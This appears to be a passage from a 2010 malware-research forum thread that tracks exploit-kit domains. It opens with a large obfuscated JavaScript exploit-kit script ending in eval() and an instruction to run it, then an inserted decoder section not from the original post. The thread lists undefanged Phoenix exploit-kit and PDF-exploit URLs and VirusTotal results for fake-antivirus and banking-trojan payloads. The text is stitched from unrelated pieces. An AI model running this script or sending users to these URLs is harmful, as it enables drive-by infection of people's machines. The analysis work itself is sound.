0b0u%2510u%5667u%8r8216u%0%A633u%s%2647uUenfa)`lsp:veesvtr}ou(efKl`as(yl)0fw(hhen`llil.Ef`CMo~ar+MUUEfon)1v.,`>sF```i+lr`naaF`nFu=atraztzzhs`linmyr`tat)tw)rneo;to(Ei)`.~l(;ot.i`a|S+2g``iozc`TNpeot;tftna))peaoortuw)a~njPaigara}}`osa;0uUkt=:`+ac;sc.iDoi`i)le(0i`l`{nSz)a(;t`d{`f=e`is2oc+bC(f`bn}e0`(ee}enh`=0m)goau0r`cfve)md.iol<sD-d~et'jaabs-B`'mnr<cBHe`rAi'ycc.;c=lnb`|)t}}Aseaquc(`=zr)`de.fdi(b'ct`=ls,d)medMe<n(;{.bies5Ata.`ct`a;.:tses`xtar(V)ntpr•/6iti`vcJ=-Bu)n'sCEosn'`lotre;amuC.((lh)L~0i<eqa'saem'oaact3jeuy`c(e'{.d+htc79~ou,Fmr(`e'JolF66367D7F6a603017D5A836B6B9C577FE80546B104807403F434195777F27CDF4F41085B598535803080567CF1B340C0046F3C7D3C3C3E364BBE35247B4358E0B35DEB44200000A10E6929716149756473656306070C000201020002h20001605E0Xelbf1`=|,,Wf5me78s6A7A292E3067s'+mC0eE647A3669786=fD+28'66292A242E24It16B708284568675809tA5F'020492926666;,st60h795749686865deA;;Dcee,u.itdnlDd;(=)f)[=liI;Wvi=Seivfdf4j}'0eIu{vaei;0='0'|5ya'e.0p,e`92m`70C4060F0FFD73B2106060000067269686379702F637C2A606474666373667A2A75694E59217569626075151A0A0C0209010C070000010000D60F6037D0D28202400LE{nd<el94/;d5u%3403u%e0f5u%00a0u%001cu%a515u%2000u%09b3u%0029u%0c0eu%d500u%8695u%5853u%385bu%5a05u%9e79u%3c00u%8a24u%e602u%`%F6D7u'u%E226uku%D209Il`ux{(l.B`a`n.aha;tnM,u`ette0.g{xuflirwgo.asepF`UUzvRnn`fbXF;tc{2as`0>.,ww(d`2o=cplFtcFn`gyineheerimesd[(gargr;af;oc`leyn~As;iN)e2tlynosr`t`;;|szweao3Ht.naeyticr;;t.ruu`;nf;rzcIErz`rirei!ci`}2mU`e``0)rl}PBfBCnf~n{e{()o+t(tsce;p(eyfev?```~ph`wo`yi~o<Iehs2+slt;(ei<`~p;tclb0`i4uaa;e)cvcd'i5Dt'cE);rrji4Dh+ekg/uyTrcycc){tkQ}o`..s(|{c}}Pc`r.`0nn`/({+omaaolidshuIdee'y;er=A=/t'}vcjbti5-rtXrtipdto/6enp=e,tytA`cr:i•/2focEarE`DCn{tOi892etOde.iipntemhbnua`;A<0dp'cra'idxBwmpkh5evmI=tercvte`;rlC6`br`Lo.'?n]Sni2D37'06361m0301FF579820EB0FFBEBB56D9AC9E08B0C23D50B0C40850D7E80F0FE1C51D04D2372B06D8536FF01A4F4007D7F6C050E6EF238B6D1E3D0994E118F20F38BA=00000F00616E40356674756073616607070F00030080D30e0230250F50OFal(59'(00I(,es52a562252865366v)'eE23287465266326'd1'A64A53232824260Na82F50292828783B
60,h'FF+09705A5B4A66}6ah2FeE2E425A2F6B3a(S}}Funt`tsgretdFfv[/,i;1pvnniPyf=Hvf<pf>)veQ0tMntevFai,=),W(9;p)(l/=0nA90o+5503050C3FFA6265900000B00C6368096F75723E3C696E5C6C426E667075646025047F00607471756A64710A1E0706050901020600000100306D6600000001020700ARItiOia7DOv=70u%0843u%10e8u%1c08u%2525u%ee20u%0000u%c823u%0550u%26a0u%8006u%4706u%9a10u%b0d0u%b060u%9860u%3008u%b7c4u%f0e7usu%C603;7u%E399d2u%F60ClenAtmoha0l(gmliyeyca`n=)ra{xf`vbnuesoftnlb.nrT=bXoton`(COMT}otv3ru1x`s`iivtv;t`2e2Fh2,cf)pnc`*``ozu`.et)`ri](}gu}tttlmp(FU.f`H;a5he.enigara}}|ie`snu2(yK(gmplo(bCtyzgnni`cu}gV.cNge=gnglf=azmi4`Jss(1;{gztjPuzY(`sssnss{n`ishPB`}Bsmpu,a`(0s`le>(d(tg%r`CwYc8`iluf)sl`u)twhkss`i+(nrtdn;r'u(`d-3h+tl.Pg`edBDe'=~`'mIMso{tk;ciTucnpQtt(`thef(a=`l=cuun2im`ceducd=y'(sEomtf.dnH'K'b.afareuAd60yeM`(o.orp/2)(o`'2c{)S{ty`ncb.`rrxreC'EDcv.Bd4-.{.Bomtopl.ineio))u(}So'=a`mal`n`prSepw=5c`ed`idClaox'r(aDB'jnvAvaM`t;(`nF722;3F327e00205AD721C134041DDC13091794C0B4884FD37530453E1038BEFA608B0505550C850F65D230F535A5FE9E06361BEF4FBC48AD63507971247536230911FA8'0000020256E6D1A6D70066364737F5112070001010F0041s20F0E6064'blse(,,Ws',Ns01aF9m68682A226276={528F+462773067603WaD8F306E2626252A51`=A7F00A564563696A'0e+50t02E5F5F58716i4me75s4B285E606765trH}}(mtAfeehir.((1a^A/fl]a=(tfDm`7Ob`9x'=)elU)TEcrXelbf0'|1Is,ve;se2nxgr50r`3510020EE0F4E8DAE06016F006561297174736A627839636C631975606475656075635813626673616C4215000B0D040B09011301000001006840105034414202014SSE.vBgs8-Ba'503u%b4c0u%0c04u%208cu%2800u%a050u%1005u%0124u%0f0cu%a800u%0055u%2745u%ef00u%383au%0a0fu%5f38u%0095u%45c4u%0626k7u%F21v46u%630+F6u%80Kcmclhacesx`4ta`s(mpttmc`{unvbu=oacnn.wuhlelv)oj`OMEfuopUUMoj;tia4`b)F4u1ddaha}of)((Fi``.u{ege=2=&wesomfa;=gn.0e]n}oihepe)lTzo<(tu6iafw(z`rirei`z`~`nt`a.Ft)peSn~aoh.V,tt`i4nt)npLe,;=`g.s``teuf)zoi~c)`t,UhIEnUwa(ttigiit`~pirjPiraipen`rs()imel`~esetu`1ifba~hzcru{ce0n;yh``pt-`+fc`e.tve)me+=84='>eir`oc:2Ci<~`++edLinciT}oviiatauorv(r(lu)p`ze`%.+u)=equndlu(0.,e+PceA'aotTaEdugturectt'-0{OL='nCdyeb.;)n';)hr;MJi`-dorp(.op`aTcCEhacJ`00
lvcJceyntototnld;;nefHb`'rvxmlv'sjicDla''t(n(focaarLOoe0sB8`P`iSipiw)mfSk6026vA6133103F02DD4B506F850D4850663B24009405B8DE3C4D322CC7F2BEB5416E862E03D80804FBE44C455E48670083F3276FC38B8733A39A479A8AD535D14C22D7C100000000E7964644C627C6E6C147963160504000101F24F0a02104C066;jah(s00Iv)4`v'+m80eF6F242A77336=fE+2C'2122346A6A71ItE6B70825552A232E09tA5F'02F5757672E6;,st60h592E292F4A77f,es52a0554458666A3ae(cffe(tn(ttb'bp).r,c;)v.rp'(`F8()Wv(3o)9{ssI;i(tyOFal`,W|2Nv0a(vkn)o1tr=;yS0F02000481195091B000021026656E4065637123342A7471616F744C6C16636304447544627F6473656306051501080804190E2000010500D60F110D000F01020000H(Pw`Jhs04Jr%6017u%0400u%26e8u%0068u%150eu%0615u%00e0u%c059u%f628u%9005u%0404u%4676u%9000u%dab0u%d0c5u%6090u%006fu%2446u%468d06u%E3a626u%F0'346u%0T=p`lix`ae1=`hx+.)peihs.fie(oan`ib.c)v`n`ynea;tVfMoF`ntabXzvVeyor5vs;);b)ttl)l;tu{~n,s>4pnvo~o``````tfeig}=`gp,l.c;toict.{u3gr`3ht,suufae=gnglfse=A~o`crfua;t.k(Rglifn```=+(ch;~rEM`i`i)le(0i`l`{nSz)o;ih`UicNcyLrtraztzzhs`lzoIEseszt.cj`is{zu`lsM`isO9(2guIp)eeonnva(xe}.i<+rr`=)itdEi.aa;e)`~C8~>'mne=bt036g'_v``n(`otovicnemctrriSievyesn{en`nuul=.;0[qmtBtmb;sw)=Eunt)pcBMtHitekn`atet,6CvbH`S'rb{nrpq;s.s;(.}BAo{Jloihwaslot'l7F(rrE=-0aarEunp/ayyn-tdyt}c)u(jhBaap>oa>rldroiv4>>itien`ss`ofbt,s6-+oedHepci[odW=22E2a2E2D6=04F05A80BB9B29E043A1D94B40050000E4B83C12DD4E4CC794C08878808585449B9B058068085102B5500CA613334F2B6642E61BBD55DE7001E2CB7DD03D'0000213007656F6D6564657861644E7604020003090F0901m2036D6069ses.'v',N=|79=)'eE23662628283127'd8'A64560253A76600Na82F50752E5A244820,h'FF+082E4E576068}4ah2FeE51285B27636(01aF9m2F272E242364=,)aunn't)'A'u,o){G`]rl[=ssa'l((.()P.(1h;3SkeC}m)i{blse(1I(4`n'r'adg{p0ha0a[C900F0300061312E2601B064036E4C6D0E75646F606E4060717F636F6C6C6E637473445D5B647560736166001A0C0E070108190101000401000A006200D111A202000()EriEti-4E`u%0087u%001du%8913u%6e15u%20a0u%a5a8u%1c10u%4c5eu%a890u%00a0u%77c6u%403fu%0028u%d008u%05edu%2020u%00f8u%4416u%371797u%Dr8216u%0%A633u'Ist=osA:p`5`+*A=m;t.o.gpuf)0ibcfdep3{a~c~`g~l}oDuzvT=d`rOMotDmpn`6atw{vs`hh
2{2eynr%e`.>)rcaf`f4+a0~~``mn]i`i)u`sp3eynstyxts2O`62i3`.tnur;=`g.s`i`=l`toaguvgtyqv)uelsu`c=:`+a4it)oG`cf~n{e{()o+t(tsce;uf`i~JsLe.RagyineheerimeewcN`teeyhtmszitesocialz~P0v4tnCe`a-d`capb2shfl`=ai0`{ni=ldarten;'c180';enp`j`2-Bh`Ma''t'=nrnematXekcosctnre{)ecv(e=gn0ensd;i;e(e#ed`ei{'Emtt;puyLkEstt'cpt'(r'50ajTph,e.s(ih.se/.sesc(Vnv-alnpipoo`e)s-Fu`eC`08ureCmtenbmp/t.(.rch{n)eermlj<wl<cggimce2<~d.dv`&esow(ju`iE4`sd)S`Nrn'vaF'7E76rF6F38'34F4113F4AD4449941BF2283F322003CC04B30C46D1803124BE2E08D817360304060C5040B5D00EBF7390D2E2D6934564B7DE376CF498837524F5607B054;8000001005E097E6931066461491F700A0900010102F3040e021E690C6vch9$=)1`=|,,={528F+976532865706WaBCF30276035637860`=A7F0032A2E282024'0e+50t02A262A28686i7me75s2F4424594867s'+m50e32B4560606B3fl;tn)tir;wt,t`d;tef+ov1lper)vl'p(&Dpl)z}1Hv{K}e;osjah((2Ns,9=)`%r1tn.0)y;sa;604F010104317605D00F01800C75646C6365632F396D197379667561616578726445634961406364737F511A17060307020A17000103010149DE4008000402020000);EidC=d24Cf5u%d30eu%1468u%5e13u%ee20u%0807u%e915u%2f27u%2fa0u%150du%1500u%0020u%0672u%0130u%0055u%1010u%0100u%0f0eu%c6c6u%0=4707u%`%F6D7u'u%E226;Mky`c.l`B?0~`2l`etynna)rn`{xde.u()r`ilR3`~t;.;trnotj=`bsMoEfrpe(d7lrhnat+``.v;mpceuw4v`)otr`|```rxA`b1[e`f~n{saeu(mp(.G.dhh`((;,s2~N3cngi`i)le(z=`l+`fc,nk)h.Uu{n`e.n=o``0)r(sh;tb=o`sssnss{n`ishPB`}no<szo.EMpfd)pnc`*``ozu`+(Le1u`+.Yipiezh`tfozxee)`9a/Oci(+p1ehtrel0ceue0`ynx0haode=p`e.tvol7A~+dnea3`cBB~t+al~o.x``otXetrOCThlekrgsrs{{tasw`tecnuue`]}n'hunyitn}'Re(rdemI='ApoE)t`e)'icA4reT.e'as.'nps.B/S.)ha)A`ajm.d?npfr=E;i0E)oaT'40n`aTe(`pleejoboaya(Sc{cii`ulpSu/=.epaa-5/;,g)(f&(ibe'erod-4e)c;P=aodBit(62602`2562/401F0372FA04278E86628A95B7ABD9008335439A268CA88FF4E8EB7B7A67F8535565010C58404C3BEC5000FF6F38B23C38BC07B63046D07D175E438A7B24Ev200040010F5D766161666E4579766473070D00010A0F0009320961606D=t.'v=|69'(00'f9+28'272E295E6836ItC6B7066A63326A6109tA5F'0642A2855562;,st60h292445402B63f,es12a620292F56676v)'eE23284641667162di}cc{.fipit`e'y}rti)Ff]vlIs)fvkds&Fdv)ce)OgsTco'nves.'s,`v0,=)nu`)hos0;(ass
}004F101010502704200026A10647C6F646E456F60646472694E6072717664646E6C754F65644E6C14796317010D0F1109010D070200070909A00F122342093202320;}Rt=T0=85Td39u%08b4u%ee90u%a05fu%a000u%9080u%5e2fu%664eu%f800u%200cu%e000u%0606u%589bu%b720u%20e8u%490au%b100u%fcd4u%f667u%s%2647usu%C603;7u%E39fEd(f,ml6a`0At`ltmh.e(t)oc(vb()pnM)o=f.e`+`h}seyecEfV`aeezvF)et.ni82(iulr`=:la}pett~f)a1;ti`a|S+2gfl+e6td=`ssthr{s(petmafViic~v``.~oH2.c,f~n{e{se=3o`b`h`cp{ifrNtnccxc`u(1;{ga.i}oc`u(ttigiit`~pirjPivtr`.nSKG~rXo{ege=2=&weso8~EM0r+8fboez`er~``dein-;=0r4P2g~`.3.Yi`(o0aan(xb`g2;elnom'peEi.abs-B`'otrr5=lFC`=`ru'bgpo=lrO.cobhi`)ITi(istFFirk`0hs0g;bli`vtbast)<Adw;Sn'ioned~`Plnl.i=E;ibl3F`cPCl'tttGd?eWo.aC`et;SJrapalidNte`lod0D;2t'c45cot'n'=ren`aoo)p`tuWtvtgdnegacep'sMtitf'ef`e.ee`)djrocnb=A4d;;}R`msorea)86366rF7C2i601F0C18C69EE24F24E1DCF9925F1008B8C3F49088B698E7EE34B0EFDFE6FF0C33532E8035686E301C050FE2562F78A49069776BEC002B032534E9DBEE947a00003E0006463656E0D4C747966426210070001040101522=02056E016n(S)e'|,,Ws',Wd9'A6406A252E68340Na82F50246F36677620,h'FF+0628252E2E25}4ah2Fe328282A60646(01aF9m5B75555F4667={528F+32A553469763anehtvcrb.dr0(0.fyV=,o=..ine;.=sfv((f>{nl&WpeIau,`nch9$v31n'0'{o0S;`pu0m)s8sf001F00000080522952060C00017609736564656D3E6F63683F7C6263796E45056F46655F6C747861644E760D11081C0619010300010503030062020C0F0020020F00}}Se'``c05>a5c5u%b005u%8500u%09b3u%0029u%0c0eu%a0f8u%e0b8u%9010u%2f2fu%0005u%94f6u%9febu%8121u%3a5cu%30d1u%0001u%eef0u%9687uku%D200k7u%F21v46u%63u(3)u`ao5sh0Ah+oh`ifwma;tteoaM)rca;t``lqs`+`rumpMtF)D0r`IotT`Myvug9`nlm2(v``elrt.iu`u`l6}oosr`t`;;)l``~a)`(tth(gthat.aeru`snaoai~N)l(~p4``sssnsi``2csetet.`tsucdhiotd.fnc)`t)rns;tlfntraztzzhs`lzoIEsa``cnscFb)oY`vo~o``````tf`MG`0n`)uInce:`o`b1e-mg1}`%`;`(t%sn8lbobsc)ppcb8l=(1`as`cese=ldarji4Dh<cBHe4`a28w~'se`jelb``obQhljem({nin0oiaLLo`dAx*cct`se<=a.ove.;1toi}(tdbcdn(<o(a>eoo`lpdus-Cqt'rl)eryElinrd.vl{lc}MA`r.va=oa`rde.:0C}`e)lEFh`e)tO`u-t=vld;p{c)Fia`hga=.rr=agwoAnil`muetidve.'PCbt`j~E5c}}fA(eowi.){79682e6926;5A0F08CC7A454875E5F3A9C1C0C270E5
7BCC19FD7B01F349B85C02F00F695F50F8505081600D0BC286500FFF7C2FB338B140ED66F2B0C4BD175E8B3180F10r0000B50006667979606F64624E6461680407000003020D47'200796025e'h.rW(00Iv)6IaB8F306C2459223530`=A7F00A2864366870'0e+80t0232658212A5i5me75s29254A6A656Bs'+m50eE5E2F5F28267=fE+25'294449676361tkl(iarausti)''au{e//rlsmttIlj=k'=l''=Sfs&PgtMtt4F=t.'vn60=),Wvp8Cw<+b/e;s98d401F000610D3C480001106304736D766C556E21261976792A646C6A694C747E61696E5574627461491F70011A0E0005051901130001010A0040DE42111A476202100ec((jiwlD3<t05d6u%8870u%e000u%c823u%0550u%26a0u%0090u%0490u%0500u%f8f9u%0047u%1756u%dc5au%b1b0u%b06au%26fau%00beu%b407u%4630d2u%F60d06u%E3a626u%Fn);{nhxc5ee0Ai`ci=sufsn}oiniba;ott}of(eutl`+ebpefiT{r)g0nEfj*f.amiA=ue``na(0n2eynor+n+2);tnigara}}`osa;g{ntraia.h(ryzgmbn=.gclr+oH;e3)r`t(ttigiz=27ai`h~ap=h.nPTinlGVputo;ih;ge.eyzutyineheerimeewcN`r?(oePBuc;tS=af`f4+a0~~``>abb8`0/nC(x``&w+e6.1ut3vuui`+jOuhe)eInlhk{e`(l0o`2)ippsuntnde=p`edBDe/uyT(5's50i0Ph=+et'jn=lju``eceevtmg,norAAnq2r82a'h}tt2`rcdirat0twnf).iuuCt'bn)y~mnnde.'ti12`(,e.;OepTa=diy/eoHlh}BVu`cim2wmI'omcC0Bc=E;s-4(=E;.B'npt`akydeoh;(orwtem'sai'rofvc'oahbndEnd(di)oaj`ePc65.e}uYn.f`ds;t46F76=42E7v708C0F3149BB48D6D3BA0200290E50BC043888C0504CFCE035FF5EF84F565F05FE0301926F448D0EB00F07F6926F02ED5BB3BD368CE4D7C3258334DDD8C61`0000F9000696067650561790F756A690B06000201DA0A07F20207650E6wSoGsIs',N=|4Nt46B704662E5A747109tA5F'020623466606;,st60h70285E2A452Ef,es12a459572864246v)'eE232F2A592A4021'dA'A6055957762B780a)seoremtehb;f)pnvrE;mvpa((nvo7p)=vy)8Hwe(DoTEc(0Ln(S)e=',=|1Ia`0=h==s2mf899a0F0F50600054976000021C007305636C657F616F2776607E426161683F6462616E456F552C6245797664730A1604070907190F20020104015F000F0B030720020340la)~'dis-5/a%5048u%d510u%1005u%0124u%0f0cu%a800u%0008u%6000u%6618u%15d5u%0746u%27ebu%00d0u%f835u%386eu%68d0u%0885u%d475u%560+F6u%832797u%Dr8216u%c{f}ceA`3`a)As2)s`.nug2;toadet}tih;tulneret`tst.Cojie{u~tF-V`Cfl,tB`m`==ulw)g`t.enn`c`(`ey(z`rirei!ci`}]teyinsrlitg.g)[ac`n`he`+l(ta2;o=atraztze=56tzfe;gr`ixcc`sgla(rn)uf`it,wKmpUn)pnc`*``ozu
`+(Le1``vuwjPvl}oX`r`|```rxA`b1=xcl`tx8cis,=1````~l3mh8an7`i=mP0ew/nC`oe.b(=0o0cb,;`.rtmtbdom'poc:2Ci'mIM)5<sD-d~Aa~`cE);u``ei(=ckC)e(e(3=ntSS`q)r6)p)<vre7t`ryoDpr;r)du{cvtmh.fuc;:;ec`oms,ed19=''aAvbae'm1(t)/TsCe(c(A`-o`p`.en)celA-Aa`loi19u`lvcJatlo'-i.on.`})n`i=Megwmpsad'ic`nseecdlncecn`sse'dolD3slln(ait:ge}r7E602/7E73a5001A16A8E8938BDF60EA7332FAA9060106B8BA3EC83F70A175FEBF38F7E0FF07B63384BBF86506BF75F61F42E787DFC961E46139244730D474D34DEEC179t00001CB00C6C655E0E52737D64496975060200010002040'02005E004C`hceiNv)2`=|,`a82F9069232F263A70,h'FF+0966763D2234}2ah2FeA642E2920582(01aF9m2F245628776A={528F+6212F2B27607WaA5F302F4247606760.;e)n`aeet'upr;pcasSv=.lt'ltfi1g;6<o;0Ok`lF.i(h'0Ae'h.r=)0'|5Nr=8ui`nt`oo959t0A8B3FF00064F2700000C50266A6679657275644F636C64646171652A6179027D4365432001647966426215020F020701090702000300030D0B620A420B05020202'st;<>=di14b;u%0cbau%6000u%00e0u%c059u%f628u%9005u%00a0u%001cu%a515u%20b0u%4616u%26bcu%3601u%5a00u%9fb0u%5c00u%55ebu%c644u%17'346u%8=4707u%`%F6D7utvuetal?5=p;~.`{.nxcn)(eynb()h}oo.eynegsinh~utyUUnVfMtm;(T1DUUu2`sCd`(``m2i;t=ufw(`t2~(&mpae=gnglf=azmi`hwpnc.gesh-fO{tg.feteai)e6hu7}t`gyinehe``68iel`})ofsd.t=.`er)oc{no<sh`fFpeUc{ege=2=&weso8~EM0ccanfIEkz;tqf`a|S+2gfl+e6`ilobh6).gh``00~sa;e8``)rec=+`p`0lf2giPclll~`xc0kl`f<naae('Ccexebt036g+edL;2'i5Dt'Rl''tl.}ln=cce`tOh{rcV1)==(HHM`;a0;e;zai`0ube'rapy`i;onvr'eeig'tl'ndnlMceep(:DE`m'tpajm`,p5)e;foePxea)S=Jm`.nn`t{unaF0'tde2d19)dearEpiuoadtacdl(};`vd'o=of`tamo`eet/hidtcee)d.d=`ec.css-5usec)vn'`enfy46D366A603r3A03A2468A33632022F8D91839DAE6E7C307B3CD24BEF0EE64EF86FEBF464FF5508C255E87500F63C4051EF7E730907B64DF9C92604B58D3A4A39AECE402Ch00005BF006D6C4F56636303426F7564170B0008003B0B20;2020F506D6Aokto`=|89'(09=E7F00B3A2A262576'0e+C0t058633820697i8me78s6B2926567E24s'+m50e626552065286=fA+25'2B482A064B61ItE6B7062F46786C760rL{{`pt'(A,t.adetrica(mic.v(=n0m})7c}0Wliv(pm)`Q0SwSoGs'|,W(1```%nl0or-rr9+5a000F6FF0F0DCBE86F1008F0E684E60697017786166796C646A63736E427376646D4E74407961624E6461660E1819010701090700000001DA08
60DE0F00008102096;ec}";function btbnhm7(ctywcq){return ctywcq.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));};var gwevh8=1177;var ipcncr='';for (xtjscnj = gwevh8; xtjscnj > 0; xtjscnj--){for (iwazgry = gwevh8-xtjscnj; iwazgry <= emgves.length; iwazgry=iwazgry+gwevh8){ipcncr=ipcncr+emgves.charAt(iwazgry);}}var ethmxz=ipcncr+"}MDAC();";var isaqbpx=btbnhm7(ethmxz);eval(isaqbpx);

Now run it. The eval result now contains the decoded script. Copy and paste the result into the top window and click "Format code" to make it more readable.
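
The reordering and substitution performed by the quoted script, as an added example that is not part of the original post: a static decoder that returns the decoded text as a string instead of handing it to eval. The function names, the regexes and the constructed sample are assumptions made for illustration; the four placeholder characters and the `}MDAC();` suffix are taken from the quoted script.

```javascript
// Static decoder for the stride-reordering obfuscation in the quoted script.
// Nothing is eval'd; the decoded text is only returned for reading.

// Placeholder characters that the page's btbnhm7() maps back after reordering.
const SUBSTITUTIONS = [
  [/`/g, ' '],
  [/~/g, '"'],
  [/\u00BB/g, String.fromCharCode(0x5 * 2)],  // "»" -> char 10, newline
  [/\u2022/g, String.fromCharCode(0x2E * 2)], // "•" -> char 92, backslash
];

// Step 3 without a DOM: read the stride out of the document.write(...) call.
// Covers both forms in the thread: '<p>1177</p>' and
// String.fromCharCode(0x3c,112,62)+'1002'+String.fromCharCode(0x3c,112,47,62).
function extractStride(script) {
  const call = /document\.write\((.*?)\);/.exec(script);
  if (!call) return null;
  const digits = /['>](\d+)['<]/.exec(call[1]);
  return digits ? parseInt(digits[1], 10) : null;
}

// The nested loops from the quoted script: read offset 0, stride, 2*stride, ...
// then offset 1, 1+stride, ... until every column has been read.
function reorder(encoded, stride) {
  if (!Number.isInteger(stride) || stride <= 0) {
    throw new RangeError('stride must be a positive integer');
  }
  let out = '';
  for (let offset = 0; offset < stride; offset++) {
    for (let i = offset; i < encoded.length; i += stride) out += encoded[i];
  }
  return out;
}

// Reorder, append the literal tail the script adds, then undo the placeholders.
function decode(encoded, stride, suffix = '}MDAC();') {
  let text = reorder(encoded, stride) + suffix;
  for (const [pattern, replacement] of SUBSTITUTIONS) {
    text = text.replace(pattern, replacement);
  }
  return text;
}

// Inverse of reorder(), used here only to build a harmless test input.
function scramble(plain, stride) {
  const cells = new Array(plain.length);
  let next = 0;
  for (let offset = 0; offset < stride; offset++) {
    for (let i = offset; i < plain.length; i += stride) cells[i] = plain[next++];
  }
  return cells.join('');
}

// Constructed sample (not from the page): a benign body using the placeholders.
const SAMPLE_BODY =
  'var`note=~constructed`sample~;\u00BBfunction`MDAC(){return`note;';
const SAMPLE_STRIDE = 7;
const SAMPLE_SCRIPT =
  'var emgves="' + scramble(SAMPLE_BODY, SAMPLE_STRIDE) + '";' +
  "document.write('<p>" + SAMPLE_STRIDE + "</p>');";

// Runs steps 3 to 5 on the constructed sample and returns the readable script.
function decodeSample() {
  const stride = extractStride(SAMPLE_SCRIPT);
  const encoded = /var emgves="([^"]*)";/.exec(SAMPLE_SCRIPT)[1];
  return { stride, text: decode(encoded, stride) };
}

console.log(decodeSample().text);
```

A wrong stride does not raise an error, it just yields scrambled text, so the number from the `document.write` call has to be carried over exactly.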

Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 01, 2010, 09:29:50 pm
Code: [Select]
http://obuddytv.com/sitemap/jdk.php
http://obuddytv.com/sitemap/trafflit.php
Exploit kit
Code: [Select]
http://obuddytv.com/sitemap/files/asshole.pdf
Pdf exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 02, 2010, 05:48:28 am
Code: [Select]
http://quindols.com/5sugm3fdkgad.php?s=IBBKB
Phoenix exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 02, 2010, 04:09:48 pm
Code: [Select]
http://negup.co.cc/red.php
Redirects to phoenix exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 02, 2010, 08:33:58 pm
Code: [Select]
http://eachdata.co.cc/user/?nid=kostes&get=cash&xml=undo&str=enabled&ID=104161
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: SysAdMini on November 02, 2010, 08:40:35 pm
Code: [Select]
http://eachdata.co.cc/user/?nid=kostes&get=cash&xml=undo&str=enabled&ID=104161
Exploit kit?

I don't get any content from this url.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 02, 2010, 10:35:37 pm
Code: [Select]
http://eachdata.co.cc/user/?nid=kostes&get=cash&xml=undo&str=enabled&ID=104161
Exploit kit?

I don't get any content from this url.
Neither do I, but I did when it first exploited me.  Maybe I do not have the main exploitation URL correct.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 03, 2010, 06:56:59 pm
Code: [Select]
http://compaund.in/15/index.php
Phoenix exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: michajp on November 04, 2010, 04:28:01 am
Code: [Select]
http://eachdata.co.cc/user/?nid=kostes&get=cash&xml=undo&str=enabled&ID=104161
Exploit kit?

I don't get any content from this url.

These are tricky and usually there is only one shot - after which the accessing IP gets kind of blacklisted. As for this exact domain I dug up the following details:

Code: [Select]
First seen at Wed Nov  3 03:39:17 JST 2010
hxxp://eachdata.co.cc/get/?db=ssl&name=temp123&done=3&xml=undo&p=165&pool=ssl

Changed at Wed Nov  3 04:59:55 JST 2010
hxxp://eachdata.co.cc/news/?nav=temp123&pid=165&str=5

Changed at Wed Nov  3 06:20:41 JST 2010
< hxxp://eachdata.co.cc/news/?nav=temp123&pid=165&str=5
---
> hxxp://bulkservice.co.cc/get/index.php?p=165&name=temp123&db=do



These URLs were redirected to by another *.php (which was found in injected iframe at some legitimate site).
Still trying around with these links but as of yet have not found a good way to get payload properly.
The index.php contains exe.phpx=jar5 (knockout.exe?) and some other stuff. Final payloads are "Security Tool", I believe.
Title: Re: Malicious Domains by Lelenina
Post by: GmG on November 04, 2010, 11:06:52 am
These URLs were redirected to by another *.php (which was found in injected iframe at some legitimate site).
Still trying around with these links but as of yet have not found a good way to get payload properly.
The index.php contains exe.phpx=jar5 (knockout.exe?) and some other stuff. Final payloads are "Security Tool", I believe.

detect geo location
different exe for country

RU JP
http://www.virustotal.com/file-scan/report.html?id=96e247f3b8498fa8d8d96d7d691999d88feb81e85d6985fd58d5c13d10535c44-1288868795
DE IT US
http://www.virustotal.com/file-scan/report.html?id=35ec83e3efe40fc5121578a86ffe10998992851d5ca70be2defe877d0dcfe7bc-1288868719
Title: Re: Malicious Domains by Lelenina
Post by: michajp on November 04, 2010, 01:55:56 pm
These URLs were redirected to by another *.php (which was found in injected iframe at some legitimate site).
Still trying around with these links but as of yet have not found a good way to get payload properly.
The index.php contains exe.phpx=jar5 (knockout.exe?) and some other stuff. Final payloads are "Security Tool", I believe.

detect geo location
different exe for country

RU JP
http://www.virustotal.com/file-scan/report.html?id=96e247f3b8498fa8d8d96d7d691999d88feb81e85d6985fd58d5c13d10535c44-1288868795
DE IT US
http://www.virustotal.com/file-scan/report.html?id=35ec83e3efe40fc5121578a86ffe10998992851d5ca70be2defe877d0dcfe7bc-1288868719

Hmm, strange. The link to your 'RU JP sample' gives:

File:    exe.php@x=jar5
Time:   Thu Nov  4 13:50:01 UTC 2010
VT Result:   9 /43 (20.9%)   

AntiVir               TR/Crypt.XPACK.Gen2   
Microsoft             VirTool:Win32/Obfuscator.KC   
Panda                 Suspicious file   
PCTools               SecurityToolFraud!Gen4   
Prevx                 Medium Risk Malware 
Sunbelt               VirTool.Win32.Obfuscator.ah!e (v)   
Symantec              SecurityToolFraud!Gen4   
TrendMicro            TROJ_FAKEAV.SMBY   
TrendMicro-HouseCall  TROJ_FAKEAV.SMBY     
6018008c56790c712abb90cb0113bdcb
--------

A sample which I just got via JP IP gave:

File:    exe.phpx=jar5-04nov10.txt
Time:   Thu Nov  4 13:50:30 UTC 2010
VT Result:   18/ 43 (41.9%)

AntiVir               TR/Crypt.XPACK.Gen   
Authentium            W32/Trojan3.CHI   
AVG                   Agent.5.AK   
BitDefender           Gen:Variant.Kazy.2562   
DrWeb                 Trojan.Packed.20878   
F-Prot                W32/Trojan3.CHI   
F-Secure              Gen:Variant.Kazy.2562   
GData                 Gen:Variant.Kazy.2562   
McAfee-GW-Edition     Heuristic.BehavesLike.Win32.Suspicious.H   
Microsoft             TrojanDownloader:Win32/Waledac.C   
NOD32                 a variant of Win32/Kryptik.HWR
Norman                W32/Fitmu.A!genr   
nProtect              Gen:Variant.Kazy.2562   
Panda                 Trj/Sinowal.XHS   
Prevx                 Medium Risk Malware 
Sophos                Mal/Zbot-AN   
TrendMicro            Cryp_Bredo-14   
TrendMicro-HouseCall  Cryp_Bredo-14     

MD5     be89942e0c9bb6012fe83f372bf83805
----

Something odd there.

Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 04, 2010, 06:46:55 pm
Code: [Select]
http://moionfolt.com/20x562fzx5j5.php?s=IBBGA
Phoenix exploit kit
